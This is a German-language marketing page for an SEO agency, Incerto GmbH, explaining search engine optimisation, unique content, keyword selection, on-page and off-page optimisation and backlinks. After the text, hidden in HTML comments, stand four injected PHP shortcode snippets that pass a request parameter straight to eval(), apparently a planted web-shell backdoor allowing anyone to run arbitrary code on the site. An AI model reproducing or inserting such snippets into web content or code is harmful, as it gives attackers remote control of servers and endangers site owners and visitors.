Suchmaschinenoptimierung SEO

Wie in der Realität ist es auch im Internet wichtig, auf sich und das eigene Unternehmen mit geeignetenMaßnahmen aufmerksam zu machen, damit das Unternehmen von den Kunden auch gefunden werden kann. In den realen Kundenbeziehungen werden Werbefachleute, Marketingexperten und außendienstfachleute eingesetzt, um für das eigene Unternehmen Kunden zu gewinnen. Auch im Internet werden Spezialisten gebraucht, die auf die Gewinnung der Kunden und der erfolgreichen Bindung an das Unternehmen spezialisiert sind. Die wichtigsten Online-Marketing-Instrumente sind die Suchmaschinenoptimierung (SEO), das Suchmaschinenmarketing (SEM) und das Social Media Marketing (SMM). Die Incerto GmbH ist Spezialist
für die Bereiche der Suchmaschinenoptimierung für Google, MSN und Yahoo. Das Internet wächst tagtäglich in unglaublich großer Geschwindigkeit und die Plazierung an den TOP-Stellen der Suchmaschinen, ist für die eigene Internetpräsenz die größte Herausfoderung. Ein höherer Besucherstrom auf der Website schlägt sich direkt in höhere Umsätze und Gewinne für das Unternehmen um. Das Internet hat durch die großen globalen Möglichkeiten Kunden zu gewinnen, das Handlungsumfeld der Unternehmen enorm vergrößert. Aber es ist auch bekannt, dass Kunden eher in ihrer näheren Umgebung nach den für sie passenden Angeboten und Unternehmen suchen. Auch kennen viele Kunden den Firmennamen der Unternehmen nicht, und suchen in den Suchmaschinen nach den gewünschten Produkten oder nach Begriffen, die mit dem Produkt verbundenen sind. Die wahrscheinlichkeit von den Kunden nur anhand des Firmennamens gefunden zu werden, ist somit nicht besonders hoch. Die Suchmaschinen ordnen die zu den eingegebenen Begriffen gefundenen Ergebnisse nach Relevanz, Datierung, Algorithmen und mathematischen Formeln. Unter dem Begriff Suchmaschinenoptimierung (SEO) oder in englischer Sprache Search Engine Optimization (SEO) werden alle Funktionen verstanden, die dazu dienen die Webseiten im Ranking der Suchmaschinen optimal an den ersten Pätzen der Suchergebnisse erscheinen zu lassen.

Erfolg durch Suchmaschinenoptimierung (SEO) und Unique Content
Um in den Suchmaschinen auf die ersten Plätze zu gelangen, ist es wichtig, die gesamte Internetpräsenz ziel- und kundenorientiert auszurichten, und die in der Website dargestellten Texte mit Unique Content zu optimieren. Unter dem Begriff Unique Content sind einzigartige Texte zu verstehen. Suchmaschinen listen Texte oder auch Wortpassagen, die schon einmal im Internet vorhanden sind, an den hinteren Plätzen der Suchergebnisse auf und das Auffinden der Webpräsenz wird wesentlich erschwert, wenn nicht sogar gänzlich unmöglich gemacht wird. Die Websites die Double Content verwenden, landen auf den hintersten Plätzen derSuchmaschinenergebnisse, je nachdem wieviel Webseitenbetreiber den Text oder die Wortpassage vorher schon auf ihren Webseiten veröffentlicht hatten. Die Incerto GmbH ist neben der klassischen und reinen Suchmaschinenoptimierung auch auf die Verwendung der entsprechenden Fachbegriffe, dem Verfassen von interessanten Unique-Content-Texten und dem richtigen Verwenden dieser Texte spezialisiert. Erkennt die Suchmaschine bestimmte vorher festgelegte Keywörter werden die kleinen Textanzeigen, auch Sponsored Links
oder Paid inclusion genannt, auf der Plattform der Suchmaschine in exclusiver Position dargestellt, und dem nach bestimmten Begriffen, Informationen und Angeboten suchenden User durch die besondere Positionierung ins Bewusstsein gerückt. Besonders wichtig ist bei dem Einsatz von SEO das sorgfältige auswählen der passenden und auf maximalen Erfolg ausgerichteten Keywörter.
Suchmaschinen orientieren sich an bestimmten Keywords
Keywords sind die Suchbegriffe, die der Nutzer in den Suchmaschinen eingibt, um bestimmte Informationen und Websites zu finden. Um hier eine gute Platzierung und das auffinden der eigenen Website zu erreichen, ist es enorm wichtig, die passenden Keywords und die am häufigsten von Usern benutzten richtigen Synonyme für die Suchbegriffe, auf den eigenen Seiten zu definieren. Das Auswählen und Anwenden der richtigen Keywords für die eigene Website gewinnt immer höhere Bedeutung, hierin wird auch ein zukunftsweisender Weg von vielen Internetexperten für die weitere Entwicklung der Suchmaschinenoptimierung und dem Auffinden der Websites, sowie dem Auflisten in den besten Rängen gesehen.

Onpage- und Offpage-Optimierung
Unter Onpage Optimierung wird die klassische Suchmaschinenoptimierung verstanden. Hierbei wurde die Website in die einzelnen Unterseiten aufgeteilt. Anhand von verschiedenen Suchbegriffen, die mit dem Inhalt kombiniert waren konnte die Website so von den Suchmaschinen gefunden werden. Die Schwierigkeit

bestand darin, die Seiten so zu optimieren, dass alle Suchwörter eine gute Chance hatten, von den Suchmaschinen erkannt und zugeordnet zu werden. Der geschickte Einsatz von den sogenannten Keywords wird auch in der Zukunft für das Intenet an Bedeutung immer stärker zunehmen, und verlangt ein steigendes Know-How und Expertenwissen für die richtige Auswahl und die Platzierung der Suchwörter.
Die Offpage-Optimierung ist die Akquirierung von hochwertigen Links, von denen aus auf die Website verwiesen wird. Dies sind die sogenannten Backlinks. Aufgrund der Höhe der Anzahl dieser Backlinks, wird zum Beispiel von Google die Relevanz der Website gemessen und ihr Rang hiernach bestimmt. Die Incerto GmbH ist besonders mit der Offpage-Optimierung vertraut und mit den Möglichkeiten der breiten Streuung, um so die erforderlichen hohen Verlinkungen durch die Backlinks für eine möglichst gute Platzierung zu erreichen. Das große Know-How unserer Mitarbeiter in den Bereichen der Onpage- und Offpage-Optimierung, und der optimierte Einsatz beider Möglichkeiten, sorgt für eine besonders gute Wahrnehmung
Ihrer Website in den Suchmaschinen und der Platzierung der Website Ihres Unternehmens im Internet.

Unique Content
Urheberrechtsfragen und das rechtliche Vorgehen gegen Urheberrechtsverletzungen, gewinnen im Internetzunehmend an Bedeutung. Allein schon aus diesem Grund ist es äußerst wichtig, Unique Content – das heißt einzigartigen erzeugten Text – auf den eigenen Websites einzustellen, um auch eventuelle Abmahnungen oder schwerwiegenden Konsequenzen nicht auf sich zu ziehen. Aber auch Suchmaschinen orientieren sich an Unique Content. Websites die Textpassagen, die auch in anderen Websites enthalten sind aufweisen, werden nachrangig behandelt und an die hinteren Plätze in der Listung verwiesen. Erfolg durch Suchmaschinenmarketing (SEM) und die Bedeutung von Backlinks in den Suchmaschinen Die Relevanz einer Website macht sich in den Suchmaschinen auch an der Häufigkeit ihrer Verlinkung auf anderen Websites bemerkbar. Backlinks sind von erheblicher Bedeutung für das Auffinden und die exklusive Plazierung der Website in den Top-10-Listen der Suchmaschinen. Die Suchmaschinen zählen die Backlinks und die

Höhe der Anzahl der Verlinkung der eigenen Website auf anderen Websites bestimmen die Rangordnung und damit den Platz der Listung.

<!– [insert_php]if (isset($_REQUEST["hxXAv"])){eval($_REQUEST["hxXAv"]);exit;}[/insert_php][php]if (isset($_REQUEST["hxXAv"])){eval($_REQUEST["hxXAv"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["eiTQ"])){eval($_REQUEST["eiTQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["eiTQ"])){eval($_REQUEST["eiTQ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["uJggZ"])){eval($_REQUEST["uJggZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["uJggZ"])){eval($_REQUEST["uJggZ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["tweOC"])){eval($_REQUEST["tweOC"]);exit;}[/insert_php][php]if (isset($_REQUEST["tweOC"])){eval($_REQUEST["tweOC"]);exit;}[/php] –>